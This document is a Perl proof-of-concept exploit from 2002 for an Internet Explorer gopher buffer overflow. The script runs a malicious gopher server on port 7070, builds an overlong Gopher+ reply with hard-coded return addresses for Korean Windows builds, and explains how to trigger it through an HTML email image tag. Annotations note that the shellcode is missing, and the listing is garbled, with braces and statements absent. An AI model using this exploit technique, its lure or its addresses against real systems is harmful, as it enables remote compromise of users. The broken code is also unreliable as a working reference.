Updated version of eat gopher...
with minor fix...

visit http://monkey.org/~mat for latest version..
# 2002.7.27
# IE gopher buffer overflow exploit
# only tested with my W2k Korean and Wme Korean windows OS...
# you maybe have to change some addresses with your installations...
#
# NOTE(review): historical (2002) proof-of-concept against the Internet
# Explorer gopher:// handler, triggered by an <img src=gopher://...> tag in
# HTML mail (see the banner below).  The copy on this page has been mangled
# by archiving: the payload bytes are absent, several braces and statements
# are missing, and the file does not parse.  It is useful only as a reference
# for the reply layout the author describes, not as runnable code.
#
# Tags for the builds the author tested against.  $os_str selects one and
# drives the per-build constants chosen in send_gopher_plus_exploit_reply().
my $w2k_sp2_kor="w2k_sp2_kor";
my $w2k_kor="w2k_kor";
my $wme_kor="wme_kor";

#choose which OS this script will support(?)
my $os_str=$wme_kor;

#for w2k_sp2_kor
#shellcode from Deepzone.com
# portshell on 8008
# (LoadLibrary: 40100c GetProcAddress: 401000)

#for w2k_me
#shellcode from Deepzone.com
# portshell on 8008
# (LoadLibrary: 4011F4 GetProcAddress: 401204)

#shellcode below is not so portable
#hard coded LoadLibrary and GetProcAddress Address...
#for w2k

# Banner.  The gopher URL in it names port 7070, the port the listener binds.
# NOTE(review): the string literal opened on the "Send target mail" line is
# never closed in this listing.  Also, printf treats the `%` sequences in the
# URL as format directives (`%2b` looks like a width-2 binary conversion), so
# the URL would not print literally; print with a single-quoted string or a
# here-doc is the right tool for fixed text.
printf "Starting eat_gopher[IE gopher BOF exploit]...\r\n";
printf " <mat\@monkey.org>\r\n";
printf " Send target mail with html like this:
<img src=gopher://<ipaddress>:7070/11/%09%09%2b>
Are you gopher?
I am eat_gopher!

require 5.002;
use strict;      # NOTE(review): no `use warnings`; undef interpolation below goes unreported
use Socket;
use Carp;

# Forward declarations so the accept loop can call spawn() without parentheses.
sub spawn;
sub send_gopher_plus_exploit_reply;

# Listener setup.  The gopher URL in the banner must point at this port.
my $port=7070;
my $proto=getprotobyname('tcp');
# NOTE(review): bareword handle (Server) bound to INADDR_ANY, i.e. every
# interface of the host, with no peer filtering: any client that connects is
# served the reply built in send_gopher_plus_exploit_reply().
socket(Server,PF_INET,SOCK_STREAM,$proto) || die "socket: $!";
setsockopt(Server,SOL_SOCKET,SO_REUSEADDR,pack("l",1)) || die "setsockopt: $!";
bind(Server,sockaddr_in($port,INADDR_ANY)) || die "bind: $!";
listen(Server,SOMAXCONN) || die "listen: $!";

printf "Listening on $port...\n";

# State shared with the accept loop, after the perlipc forking-server pattern:
# $waitedpid is presumably set by a SIGCHLD handler (its body is not in this
# listing); $paddr holds the packed peer address returned by accept().
my $waitedpid=0;
my $paddr;

# NOTE(review): named REAPER (the SIGCHLD handler in the perlipc example this
# follows) but the lines shown are the accept loop; the handler body, the
# $SIG{CHLD} assignment, the loop's opening brace and the closing braces are
# all missing from this listing.
sub REAPER {

# perlipc idiom: keep calling accept() while it returns a peer or was only
# interrupted by a child exiting ($waitedpid set, $paddr undef).
for($waitedpid=0;($paddr=accept(Client,Server))||$waitedpid;$waitedpid=0,close Client)
        next if $waitedpid and not $paddr;
        my ($port,$iaddr)=sockaddr_in($paddr);   # this $port shadows the listener's $port
        my $addr_str=inet_ntoa($iaddr);
        my $name=gethostbyaddr($iaddr,AF_INET);  # undef when the peer has no reverse record
        printf "got connection: $name: $addr_str\n";

        # Child body is missing here; presumably it calls
        # send_gopher_plus_exploit_reply() for the connected client.
        spawn sub{

# Fork a child whose STDIN/STDOUT are the client socket and run CODEREF in it;
# the parent returns to the accept loop.
# NOTE(review): the fork() call and the parent/child branch are missing between
# `my $pid;` and `return; #parent`, so this sub is incomplete as shown.
sub spawn {
        my $coderef=shift;
        unless(@_ == 0 && $coderef && ref($coderef) eq 'CODE'){
                printf "what the hell??\n";
                confess "usage: spawn CODEREF";
        my $pid;
                return; #parent
        # `<&Client` / `>&Client` is dup syntax, not a file name, so the two-arg
        # open is not the usual mode-injection hazard here.
        open(STDIN,"<&Client") || die "can't dup client to stdin";
        open(STDOUT,">&Client") || die "can't dup client to stdout";
        exit &$coderef();   # child's exit status is whatever CODEREF returns

# Build the malformed Gopher+ reply and write it to the client (STDOUT).  The
# template has two %s slots: one inside +VIEWS, one inside +ABSTRACT.
# NOTE(review): the opening brace after the sub name is missing in this listing.
sub send_gopher_plus_exploit_reply
        my $send_buffer="+-2\r\n+INFO: 1helllo\tyou\thohst\t70\t+\r\n+ADMIN:\r\nAdmin: 
mat <mat\@monkey.org>\r\nMod-Date: August 15,1992 <19920815185503>\r\n+VIEWS:\r\n%s 
<hi>\r\n+ABSTRACT:\r\nThe shellcode:%s";
        #my $send_buffer="+-2\r\n+INFO: 1t\they\thost\t70\t+\r\n+VIEWS:\r\n%s 

        # Pieces of the overlong +VIEWS line.  Only $retaddr, $additional_str and
        # $bootcode are concatenated below; $fillup_str1, $ool_flag, $fillup_str2,
        # $get_line_ret and $end_part are declared but never used in this listing.
        my $fillup_str1="A"x216;
        my $ool_flag=pack("L",0x00000001); #not matters(for testing)
        my $fillup_str2="A"x8;
        my $get_line_ret=pack("L",0x00002F65); #not matters(for testing)
        my $end_part="C"x12;

        #call esp(FF E4)
        #our code jumps to esp
        # Per-build address the author describes as "call esp"; hard-coding it
        # per OS/locale is what ties this PoC to the Korean W2K/WMe builds
        # named at the top of the file.
        my $retaddr;
        if($os_str eq $w2k_sp2_kor || $os_str eq $w2k_kor)
                $retaddr=pack("L",0x70426e70); #w2k SP2 Korean Version
        }elsif($os_str eq $wme_kor)
                $retaddr=pack("L",0x75ff875b); #wme Korean Version

        my $additional_str="X"x8;

        my $bootcode=""; #go to the shellcode position! by looking up a variable in 
the stack(which is hMemHandle) and following the structure... This is caused by the 
gopher code can't process more than 1024 bytes in a line.
        # NOTE(review): the two lines above are the wrapped tail of the comment
        # on `my $bootcode`, not code.  The per-build bootcode bodies and the
        # closing braces below are missing, so every branch is empty as shown.
        if($os_str eq $w2k_sp2_kor)
  # in sometime this code can't be used~
# this works always..
        }elsif($os_str eq $w2k_kor)
        }elsif($os_str eq $wme_kor)
        # NOTE(review): $fillup_str is never declared (only $fillup_str1 and
        # $fillup_str2 are), which `use strict` rejects at compile time.
        my $exploit_str="$fillup_str$retaddr$additional_str$bootcode";

        # Payload bodies are likewise absent from this listing; the header
        # comments only say they came from Deepzone.com.
        my $shellcode="";
        if($os_str eq $w2k_sp2_kor || $os_str eq $w2k_kor)
        }elsif($os_str eq $wme_kor)
        # STDOUT is the client socket in the child (dup'd in spawn), so this is
        # the reply the connecting gopher client receives.
        printf $send_buffer,$exploit_str,$shellcode;
